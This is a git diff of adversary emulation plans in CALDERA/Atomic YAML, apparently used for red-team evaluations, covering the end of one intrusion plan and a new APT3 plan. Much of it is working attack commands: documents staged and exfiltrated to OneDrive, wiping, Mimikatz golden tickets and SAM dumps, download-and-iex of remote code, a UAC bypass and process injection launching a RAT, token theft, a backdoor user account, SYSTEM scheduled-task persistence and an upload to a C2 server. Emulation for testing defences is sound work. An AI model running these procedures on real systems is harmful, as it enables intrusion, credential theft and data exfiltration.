{ - write-host "[+] Documents successfully staged for collection."; - } - - payloads: - - stepSeventeen_zip.ps1 - - input_arguments: - profile_user_day2: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - try{ - if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { - New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; - } - } catch { - write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; - exit 1; - } - - if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { - write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; - exit 1; - } - Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; - . .\stepSeventeen_zip.ps1; - zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; - if ($?) 
{ - write-host "[+] Documents successfully staged for collection."; - } - -# Step 18 - Exfiltration - -- id: 4840d6dd-da13-401a-be46-05db56f4e1e0 - name: Exfiltrate data to OneDrive - description: Transfer data to a OneDrive account - tactic: exfiltration - technique: - attack_id: T1537 - name: "Transfer Data to Cloud Account" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_exfiltration - procedure_step: "18.A" - platforms: - windows: - psh,pwsh: - command: | - $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); - if($err -Like "*System error 85*") { - Write-Host "OneDrive net drive is already mounted!"; - } elseif($err -Like "*System error 67*") { - Write-Host "OneDrive net drive mount failed - Check URL!"; - Write-Host "#{onedrive.url}"; - exit 1; - } elseif($err -Like "*System error 1244*") { - Write-Host "Could not authenticate to OneDrive - Check Creds!"; - Write-Host "User: #{onedrive.username}"; - Write-Host "Password: #{onedrive.password}"; - exit 1; - } - - Write-Host "Mount Successful" - Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; - if(!$?){ - exit 1; - } - - Write-Host "Copy Successfull" - exit 0; - - input_arguments: - onedrive.url: - description: URL for OneDrive net drive - type: URL - default: https://contoso-my.sharepoint.com/personal/johnd_contoso_onmicrosoft_com/ - - onedrive.username: - description: Username for OneDrive authentication - type: string - default: Administrator - - onedrive.password: - description: Password for OneDrive authentication - type: string - default: Password123! 
- - executors: - - name: powershell - command: | - $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); - if($err -Like "*System error 85*") { - Write-Host "OneDrive net drive is already mounted!"; - } elseif($err -Like "*System error 67*") { - Write-Host "OneDrive net drive mount failed - Check URL!"; - Write-Host "#{onedrive.url}"; - exit 1; - } elseif($err -Like "*System error 1244*") { - Write-Host "Could not authenticate to OneDrive - Check Creds!"; - Write-Host "User: #{onedrive.username}"; - Write-Host "Password: #{onedrive.password}"; - exit 1; - } - - Write-Host "Mount Successful" - Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; - if(!$?){ - exit 1; - } - - Write-Host "Copy Successfull" - exit 0; - -# Step 19 - Cleanup - -- id: f820b93d-6176-4a72-a138-a70b0b549c49 - name: Data Wiping of staged files - description: Securely delete previously staged files. - tactic: impact - technique: - attack_id: T1561.001 - name: "Disk Wipe: Disk Content Wipe" - cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" - procedure_group: procedure_impact - procedure_step: "19.A" - platforms: - windows: - psh,pwsh: - command: | - . .\wipe.ps1; - wipe "m.exe"; - wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; - wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; - payloads: - - wipe.ps1 - - executors: - - name: powershell - command: | - . 
.\wipe.ps1; - wipe "m.exe"; - wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; - wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; - -# Step 20 - Leverage Persistence - -- id: 267bad86-3f06-49f1-9a3e-6522f2a61e7a - name: Execute Invoke-Mimikatz - description: Perfofrm Mimikatz credential collection - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_cred_access - procedure_step: "20.A.1" - platforms: - windows: - psh,pwsh: - command: | - klist purge; - . .\Invoke-Mimikatz.ps1; - invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; - klist; - invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; - payloads: - - Invoke-Mimikatz.ps1 - - input_arguments: - target.domain.name: - description: Target domain name - type: string - default: domain - - target.sid: - description: SID for target user - type: string - default: S-1-5-21-1004336348-1177238915-682003330-512 - - target.ntlm: - description: NTLM hash for target user - type: string - default: 855c3697d9979e78ac404c4ba2c66533 - - target.winrm.username: - description: Username for winrm target user - type: string - default: Administrator - - executors: - - name: powershell - command: | - klist purge; - . 
.\Invoke-Mimikatz.ps1; - invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; - klist; - invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; - -- id: afb8d8f7-d059-4825-95ae-c5727e2db320 - name: Triggering Persistent - description: Trigger RegKey persistence by rebooting the machine - tactic: persistence - technique: - attack_id: T1218.011 - name: "Signed Binary Proxy Execution: Rundll32" - cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" - procedure_group: procedure_persistence - procedure_step: "20.B" - platforms: - windows: - psh,pwsh: - command: | - Restart-Computer -Force; - - executors: - - name: powershell - command: | - Restart-Computer -Force; diff --git a/apt3/Emulation_Plan/yaml/APT3.yaml b/apt3/Emulation_Plan/yaml/APT3.yaml new file mode 100644 index 00000000..7cdd3254 --- /dev/null +++ b/apt3/Emulation_Plan/yaml/APT3.yaml 
@@ -0,0 +1,763 @@
+# APT3.yaml - CALDERA and Atomic style TTPs
+
+- emulation_plan_details:
+ id: 9e69f345-fdfe-4bbc-bc4f-1c588fa56b4f
+ adversary_name: APT3
+ adversary_description: APT3 (...)
+ attack_version: 8.1
+ format_version: 1.0
+
+# Step 2
+
+# Phase 1
+
+- id: ee08a427-1e1d-4d8a-aeb1-978a7fcf9087
+ name: System Network Configuration Discovery
+ description: The ipconfig utility is executed via cmd to enumerate local TCP/IP network configuration information.
+ tactic: discovery
+ technique:
+ attack_id: T1016
+ name: "System Network Configuration Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.A.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ ipconfig /all
+
+ executors:
+ - name: command_prompt
+ command: |
+ ipconfig /all
+
+- id: 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce
+ name: System Network Configuration Discovery
+ description: The arp utility is executed via cmd to enumerate local ARP configuration information.
+ tactic: discovery
+ technique:
+ attack_id: T1016
+ name: "System Network Configuration Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.A.2"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ arp -a
+
+ executors:
+ - name: command_prompt
+ command: |
+ arp -a
+
+# Phase 2
+
+- id: 35d95b64-c1f8-4ac7-a2f2-8959218239cd
+ name: System Owner / User Discovery
+ description: The native echo command is executed via cmd to enumerate local environment variables associated with current user and domain.
+ tactic: discovery
+ technique:
+ attack_id: T1033
+ name: "System Owner/User Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.B.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ echo %USERDOMAIN%\%USERNAME%
+
+ executors:
+ - name: command_prompt
+ command: |
+ echo %USERDOMAIN%\%USERNAME%
+
+# Phase 3
+
+- id: 5df12481-9d8c-4235-b550-9cefc8ed7361
+ name: Process Discovery
+ description: API call(s) are executed to enumerate local running processes.
+ tactic: discovery
+ technique:
+ attack_id: T1057
+ name: "Process Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.C.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ Import-Module .\ps.ps1 -Verbose -Force;
+ ProcessList
+ payloads:
+ - ps.ps1
+
+ executors:
+ - name: powershell
+ command: |
+ Import-Module .\ps.ps1 -Verbose -Force;
+ ProcessList
+
+- id: 41610306-087c-4c34-874b-37b8ed633a36
+ name: Process Discovery
+ description: The tasklist utility is executed via cmd to enumerate local running processes.
+ tactic: discovery
+ technique:
+ attack_id: T1057
+ name: "Process Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.C.2"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ tasklist /v
+
+ executors:
+ - name: command_prompt
+ command: |
+ tasklist /v
+
+# Phase 4
+
+- id: 2ff877b4-0c00-401e-9d3f-070c70b610df
+ name: System Service Discovery
+ description: The sc utility is executed via cmd to enumerate local active services.
+ tactic: discovery
+ technique:
+ attack_id: T1007
+ name: "System Service Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.D.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ sc query
+
+ executors:
+ - name: command_prompt
+ command: |
+ sc query
+
+- id: 144b1384-5060-494f-80eb-91772695cdf3
+ name: System Service Discovery
+ description: The net utility is executed via cmd to enumerate local active services.
+ tactic: discovery
+ technique:
+ attack_id: T1007
+ name: "System Service Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.D.2"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ net start
+
+ executors:
+ - name: command_prompt
+ command: |
+ net start
+
+# Phase 5
+
+- id: d2ea2676-7f85-4228-b980-ab3c0e1adc03
+ name: System Information Discovery
+ description: The systeminfo utility is executed via cmd to enumerate local operating system configuration.
+ tactic: discovery
+ technique:
+ attack_id: T1082
+ name: "System Information Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.E.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ systeminfo
+
+ executors:
+ - name: command_prompt
+ command: |
+ systeminfo
+
+- id: 7c2a6e5b-1adb-464f-a581-4677391f8dd6
+ name: System Information Discovery
+ description: The net utility is executed via cmd to enumerate local operating system configuration.
+ tactic: discovery
+ technique:
+ attack_id: T1082
+ name: "System Information Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.E.2"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ net config workstation
+
+ executors:
+ - name: command_prompt
+ command: |
+ net config workstation
+
+# Phase 6
+
+- id: faa96e7f-081a-40b7-a743-a6a7f2627ea3
+ name: Permissions Groups Discovery
+ description: The net utility is executed via cmd to enumerate members of the local system's administrators group.
+ tactic: discovery
+ technique:
+ attack_id: T1069
+ name: "Permission Groups Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.F.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ net localgroup administrators
+
+ executors:
+ - name: command_prompt
+ command: |
+ net localgroup administrators
+
+- id: 26181249-be75-41ed-9fe7-5c30ea8c2d4d
+ name: Permissions Groups Discovery
+ description: The net utility is executed via cmd to enumerate members of the domain controller’s administrators group.
+ tactic: discovery
+ technique:
+ attack_id: T1069
+ name: "Permission Groups Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.F.2"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ net localgroup administrators /domain
+
+ executors:
+ - name: command_prompt
+ command: |
+ net localgroup administrators /domain
+
+- id: 84377d7a-0363-44fd-a082-44657ca1858f
+ name: Permissions Groups Discovery
+ description: The net utility is executed via cmd to enumerate members of the domain administrators group.
+ tactic: discovery
+ technique:
+ attack_id: T1069
+ name: "Permission Groups Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.F.3"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ cmd.exe /c net group "Domain Admins" /domain
+
+ executors:
+ - name: powershell
+ command: |
+ cmd.exe /c net group "Domain Admins" /domain
+
+# Phase 7
+
+- id: 61221fb9-cb32-46d5-98fd-90567a621526
+ name: Account Discovery
+ description: The net utility is executed via cmd to enumerate domain user accounts.
+ tactic: discovery
+ technique:
+ attack_id: T1087
+ name: "Account Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.G.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ net user /domain
+
+ executors:
+ - name: command_prompt
+ command: |
+ net user /domain
+
+- id: 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76
+ name: Account Discovery
+ description: The net utility is executed via cmd to enumerate detailed information about a specific user account.
+ tactic: discovery
+ technique:
+ attack_id: T1087
+ name: "Account Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.G.2"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ net user %USERNAME% /domain
+
+ executors:
+ - name: command_prompt
+ command: |
+ net user %USERNAME% /domain
+
+# Phase 8
+
+- id: 5c23f638-9cfc-4fc4-9cab-4af628fef70a
+ name: Query Registry
+ description: The reg utility is executed via cmd to enumerate a specific Registry key associated with local system policies to ensure that the user will not be prompted for credentials when elevating permissions.
+ tactic: discovery
+ technique:
+ attack_id: T1012
+ name: "Query Registry"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "2.H.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+
+ executors:
+ - name: command_prompt
+ command: |
+ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+
+# Step 3
+
+# Phase 9
+
+- id: 1345bff7-6f26-43b2-a92a-9aabccdb3db0
+ name: Bypass User Account Control
+ description: A UAC bypass technique is executed to steal the token of an existing high-integrity process and launch a new, high-integrity RAT with limited functionality.
+ tactic: privilege-escalation
+ technique:
+ attack_id: T1134.001
+ name: "Access Token Manipulation: Token Impersonation/Theft"
+ cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016"
+ procedure_group: procedure_privesc
+ procedure_step: "3.A.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force;
+ Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;
+ $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')"));
+ Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose
+ payloads:
+ - update.ps1
+ - Invoke-BypassUACTokenManipulation.ps1
+
+ input_arguments:
+ server:
+ description: IP or Hostname of server
+ type: string
+ default: 192.0.2.10
+
+ executors:
+ - name: powershell
+ command: |
+ Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force;
+ Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;
+ $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')"));
+ Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose
+
+# Phase 10
+
+- id: 088b8639-3f37-42cc-9dc8-01aabb645461
+ name: Process Injection
+ description: The limited functionality high-integrity RAT will inject malicious code into an existing fully functional high-integrity process, resulting in a new elevated, fully functional high-integrity RAT.
+ tactic: privilege-escalation
+ technique:
+ attack_id: T1055
+ name: "Process Injection"
+ cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016"
+ procedure_group: procedure_privesc
+ procedure_step: "3.B.1 - 3.C.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ Import-Module .\Invoke-PSInject.ps1 -Verbose -Force;
+ Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;
+ $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')"));
+ Inject -PoshCode $pcode;
+ payloads:
+ - update.ps1
+ - Invoke-PSInject.ps1
+
+ input_arguments:
+ server:
+ description: IP or Hostname of server
+ type: string
+ default: 192.0.2.10
+
+ executors:
+ - name: powershell
+ command: |
+ Import-Module .\Invoke-PSInject.ps1 -Verbose -Force;
+ Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;
+ $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')"));
+ Inject -PoshCode $pcode;
+
+# Step 4
+
+# Phase 11
+
+- id: 59592c35-8207-4896-8d8b-36ad4600245d
+ name: Remote System Discovery
+ description: The net utility is executed via cmd to enumerate DCs within the domain
+ tactic: discovery
+ technique:
+ attack_id: T1018
+ name: "Remote System Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "4.A.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ cmd.exe /c net group "Domain Controllers" /domain
+
+ executors:
+ - name: powershell
+ command: |
+ cmd.exe /c net group "Domain Controllers" /domain
+
+- id: 24ed020e-4730-4000-b6b4-6b5d3e95314f
+ name: Remote System Discovery
+ description: The net utility is executed via cmd to enumerate hosts within the domain.
+ tactic: discovery
+ technique:
+ attack_id: T1018
+ name: "Remote System Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "4.A.2"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ cmd.exe /c net group "Domain Computers" /domain
+
+ executors:
+ - name: powershell
+ command: |
+ cmd.exe /c net group "Domain Computers" /domain
+
+# Phase 12
+
+- id: 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b
+ name: System Network Configuration Discovery
+ description: The netsh utility is executed via cmd to enumerate local firewall configuration information.
+ tactic: discovery
+ technique:
+ attack_id: T1016
+ name: "System Network Configuration Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "4.B.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ netsh advfirewall show allprofiles
+
+ executors:
+ - name: command_prompt
+ command: |
+ netsh advfirewall show allprofiles
+
+# Phase 13
+
+- id: ba0b398d-91b8-490a-bed2-f959afa8e1aa
+ name: System Network Connections Discovery (T1049)
+ description: The netstat utility is executed via cmd to enumerate local active network connections.
+ tactic: discovery
+ technique:
+ attack_id: T1049
+ name: "System Network Connections Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "4.C.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ netstat -ano
+
+ executors:
+ - name: command_prompt
+ command: |
+ netstat -ano
+
+# Step 5
+
+# Phase 14
+
+- id: 4ef6009d-2d62-4bb4-8de9-0458df2e9567
+ name: Credential Dumping
+ description: Dumping credentials via wmidump (Mimikatz)
+ tactic: credential-access
+ technique:
+ attack_id: T1003
+ name: "Credential Dumping"
+ cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
+ procedure_group: procedure_cred_access
+ procedure_step: "5.A.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ . .\stepFourteen_credDump.ps1;
+ payloads:
+ - stepFourteen_credDump.ps1
+
+ executors:
+ - name: powershell
+ command: |
+ . .\stepFourteen_credDump.ps1;
+
+# Phase 15
+
+- id: effbedc1-1bc8-4a75-9395-980559700008
+ name: Credential Dumping using Process Injection
+ description: Mimikatz lsadump::sam is executed via Invoke-Mimikatz to dump hashes via process injection into LSASS.
+ tactic: credential-access
+ technique:
+ attack_id: T1003
+ name: "Credential Dumping"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_cred_access
+ procedure_step: "5.A.2"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
+ $web = (New-Object System.Net.WebClient);
+ $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");
+ iex $result;
+ function hashdump
+ {
+ Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit"
+ };
+ hashdump;
+
+ executors:
+ - name: powershell
+ command: |
+ [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
+ $web = (New-Object System.Net.WebClient);
+ $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");
+ iex $result;
+ function hashdump
+ {
+ Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit"
+ };
+ hashdump;
+
+# Phase 16
+
+- id: 03afada1-1714-408f-bde5-f528b91dc89d
+ name: 5.B.1 - Access Token Manipulation (T1134),
+ 6.A.1 - Query Registry (T1012),
+ 7.B.1 - Remote File Copy (T1105),
+ 7.C.1 - Scheduled Tasks (T1053),
+ 8.A.1/2 - File and Directory Discovery (T1083)
+ description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process.
+ tactic: defensive-evasion
+ technique:
+ attack_id: T1134
+ name: "Access Token Manipulation"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_def_evasion
+ procedure_step: "5.B.1 - 8.A.2"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ Import-Module .\StealToken.ps1 -Verbose -Force;
+ StealToken;
+ CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"';
+ CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM';
+ CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}';
+ CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';
+ RevertToSelf;
+ payloads:
+ - StealToken.ps1
+ - sandcat.go-windows
+
+ input_arguments:
+ remote.file.share:
+ description: IP or Hostname of remote file share
+ type: string
+ default: 192.0.2.10
+
+ server:
+ description: IP or Hostname of server
+ type: string
+ default: 127.0.0.1
+
+ executors:
+ - name: powershell
+ command: |
+ Import-Module .\StealToken.ps1 -Verbose -Force;
+ StealToken;
+ CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"';
+ CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM';
+ CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}';
+ CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';
+ RevertToSelf;
+
+# Step 8
+
+# Phase 17
+
+- id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a
+ name: Screen Capture (T1113)
+ description: Native API call(s) were used to collect a screenshot.
+ tactic: collection
+ technique:
+ attack_id: T1113
+ name: "Screen Capture"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_collection
+ procedure_step: "8.D.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ Import-Module .\Get-Screenshot.ps1 -Verbose -Force;
+ Get-Screenshot;
+ payloads:
+ - Get-Screenshot.ps1
+
+ executors:
+ - name: powershell
+ command: |
+ Import-Module .\Get-Screenshot.ps1 -Verbose -Force;
+ Get-Screenshot;
+
+# Step 9
+
+# Phase 18
+
+- id: d5170a60-3bdc-44e0-9870-a38db5c0cf81
+ name: File and Directory Discovery (T1083)
+ description: PowerShell's Get-ChildItem alias 'ls' is used to enumerate files in a remote file share.
+ tactic: discovery
+ technique:
+ attack_id: T1083
+ name: "File and Directory Discovery"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_discovery
+ procedure_step: "9.A.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ ls #{remote.file.share}
+
+ input_arguments:
+ remote.file.share:
+ description: IP or Hostname of remote file share
+ type: string
+ default: 192.0.2.20
+
+ executors:
+ - name: powershell
+ command: |
+ ls #{remote.file.share}
+
+- id: 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6
+ name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041)
+ description: Copy a target file from a remote file share through the existing C2 channel
+ tactic: exfiltration
+ technique:
+ attack_id: T1041
+ name: "Exfiltration Over C2 Channel"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_exfiltration
+ procedure_step: "9.B.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ Import-Module .\upload.ps1 -Verbose -Force;
+ Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload";
+ cleanup: |
+ remove-item upload.ps1 -Force
+ payloads:
+ - upload.ps1
+
+ input_arguments:
+ profile_user:
+ description: Name of profile user
+ type: string
+ default: Administrator
+
+ server:
+ description: IP or Hostname of server
+ type: string
+ default: 192.0.2.10
+
+ executors:
+ - name: powershell
+ command: |
+ Import-Module .\upload.ps1 -Verbose -Force;
+ Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload";
+ cleanup_command: |
+ remove-item upload.ps1 -Force
+
+# Step 10
+
+# Phase 19
+
+- id: 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe
+ name: Scheduled Task
+ description: Reboot the machine to aid in peristence callbacks
+ tactic: impact
+ technique:
+ attack_id: T1529
+ name: "System Shutdown/Reboot"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_impact
+ procedure_step: "10.A.1-10.A.2"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ write-host "[*] Restarting Computer";
+ Restart-Computer -Force;
+
+ executors:
+ - name: powershell
+ command: |
+ write-host "[*] Restarting Computer";
+ Restart-Computer -Force;
+
